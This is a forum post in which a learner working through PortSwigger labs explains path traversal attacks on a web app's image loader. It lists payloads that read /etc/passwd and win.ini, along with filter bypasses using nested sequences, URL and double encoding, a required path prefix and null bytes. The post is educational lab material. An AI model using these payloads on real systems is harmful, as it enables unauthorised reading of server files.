Sup everyone, currently doing all the Portswigger's labs to prepare for a certif

1. Sup everyone, currently doing all the Portswigger's labs to prepare for a certification. Im doing all the labs so it will be plenty of repetation like this, anyways hope yoou enjoy and help someone out.
2.  
3. So if we consider a web app showing some images the HTML would look like something like this: [B]<img src"/loadimage?filename=image.png">[/B]. The img src takes a filename & returns the image using a filesystem API.
4.  
5. The default image location is in [B]/var/www/images/[/B] so if there is no firewall rule stopping us from jumping directorys we could read arbitrary files. [B]../[/B] means to jump one directory forward (kind of like in breaking parser logic), so if we would input [B]../../../[/B] it means we would be in the root directory basically skipping [B]/var/www/images/[/B].
6.  
7. So only for PoC we could write [B]https://vuln.com/loadimage?filename=../../../etc/passwd[/B] in the URI and we would be able to read /etc/passwd. For a windows server this would be [B]https://vuln.com/loadimage?filename=..\..\..\windows\win.ini[/B].
8.  
9. Some ways of circumventing the firewall rules (if poorly written) we could for example try to use the absolute path which would be [B]filename=/etc/passwd[/B] or trying a nested traversal sequence like [B]....// or .... \/[/B] which would strip out the ../ in the middle and leave the [B]../[/B] left.
10.  
11. In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request (no character will be encoded), web servers may strip any directory traversal sequences before passing your input to the application. You can try with URL encoding or double URL encoding which would be [B]%2e%2e%2f or %252e%252e%252f[/B]. There are also some non-standard encodings like [B] ..%c0%af or ..%ef%bc%8f[/B] may work.
12.  
13. Some web apps require that the URL starts with /var/www/images so for example [B]filename=/var/www/images/../../../etc/passwd[B] could also get you bypassed.
14.  
15. If the web app require that the user input ends with a expected file format for example .png you might be able to bypass this with a null byte which would be [B]https://vuln.com/loadimage?filename=../../../etc/passwd%00.png[/B]
16.  
17.  
18. -Admin/0xgh64